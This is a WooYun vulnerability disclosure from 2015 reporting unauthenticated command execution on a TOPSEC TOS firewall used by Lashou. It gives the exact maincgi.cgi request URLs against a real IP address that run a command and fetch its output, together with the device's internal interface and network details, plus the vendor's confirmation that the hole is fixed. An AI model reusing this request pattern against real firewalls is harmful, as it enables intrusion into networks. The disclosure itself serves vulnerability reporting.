当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
拉手网某系统命令执行
相关厂商:
漏洞作者:
提交时间:
2015-12-11 12:52
修复时间:
2015-12-19 15:21
公开时间:
2015-12-19 15:21
漏洞类型:
命令执行
危害等级:
自评Rank:
15
漏洞状态:
厂商已经修复
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2015-12-11: 细节已通知厂商并且等待厂商处理中
2015-12-11: 厂商已经确认,细节仅向厂商公开
2015-12-19: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

拉手网某系统命令执行

详细说明:

拉手网的TOPSEC TOS 防火墙设备存在命令执行

https://59.151.89.6:8080/cgi/maincgi.cgi?Url=Command&Action=id&Para=id


命令执行后
通过

https://59.151.89.6:8080/cgi/maincgi.cgi?Url=CommandResult


查看返回结果

漏洞证明:

lashou1111111.jpg


lashou2222222.jpg


看了下内网IP

dummy Link encap:Point-to-Point Protocol
inet addr:1.2.3.4 P-t-P:1.2.3.4 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:65534 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:160915315 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:3167400654 (3020.6 Mb)
eth0 Link encap:Ethernet HWaddr 00:13:32:0A:61:B2
inet addr:192.168.1.254 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:10 Base address:0xbc00 Memory:fe9e0000-fea00000
eth1 Link encap:Ethernet HWaddr 00:13:32:0A:61:B3
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:5 Base address:0xcc00 Memory:feae0000-feb00000
eth10 Link encap:Ethernet HWaddr 00:13:32:06:16:54
inet addr:10.168.22.1 Bcast:10.168.22.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2505880170 errors:0 dropped:0 overruns:0 frame:0
TX packets:4028329592 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:3968265358 (3784.4 Mb) TX bytes:2382826955 (2272.4 Mb)


与之前拉手内外网段一只,外网也是拉手某C段ip,可以断定是拉手的设备。

修复方案:

限制下maincgi.cgi访问权限。

版权声明:转载请注明来源 路人甲@乌云


>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-12-11 14:05

厂商回复:

非常感谢您的报告,我们会马上处理.谢谢.

最新状态:

2015-12-19:已经修复.谢谢.